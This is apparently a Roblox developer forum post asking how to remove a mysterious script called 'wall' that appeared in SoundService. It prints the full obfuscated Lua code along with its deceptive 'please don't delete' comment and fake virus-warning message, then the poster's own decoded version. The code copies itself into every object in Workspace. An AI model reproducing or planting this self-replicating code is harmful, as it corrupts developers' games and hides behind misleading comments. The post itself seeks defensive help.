I want to remove this virus from my game.
function bnjjwerhg__dsadjwdaijnaknjnejnejnaaG_Gfhika(cldn,dsdcn,djeamm,efja,fsy,dhjsiar,hjauhrm,ahfdsa) for ajenljd,idjbgt in ipairs(game.Workspace:GetDescendants())do dfbnrjkrjht=Instance.new("SpecialMesh",idjbgt)print("robloxstudio checking...")script:Clone().Parent=idjbgt wait() wait() wait() end end;getfenv().script:FindFirstAncestorWhichIsA('DataModel'):FindFirstChildWhichIsA('Workspace', false);bnjjwerhg__dsadjwdaijnaknjnejnejnaaG_Gfhika("d","d","d","d","d","d","d","d","d","d","d","d","d","d","d")
There are a bunch of whitespace leading up to this and at the top it says:
--[[This is a script of Roblox Studio, please don't delete
]] script.Parent = game.Workspace; print("Warning! Virus detekted now removng virus")
It’s called wall, and it randomly appeared in SoundService.
I do not have any plugins, team create is off and this game is a local file that has not been published, and I do not have a single free model inside my game.
Also, this is the first time it appears here.
I decoded it to:
function functionName(random unused arguments)
for _,child in ipairs(game.Workspace:GetDescendants()) do
mesh=Instance.new("SpecialMesh", child)print("robloxstudio checking...")script:Clone().Parent= child
wait() wait() wait() end
end;
getfenv().script:FindFirstAncestorWhichIsA('DataModel'):FindFirstChildWhichIsA('Workspace', false);
functionName("d","d","d","d","d","d","d","d","d","d","d","d","d","d","d")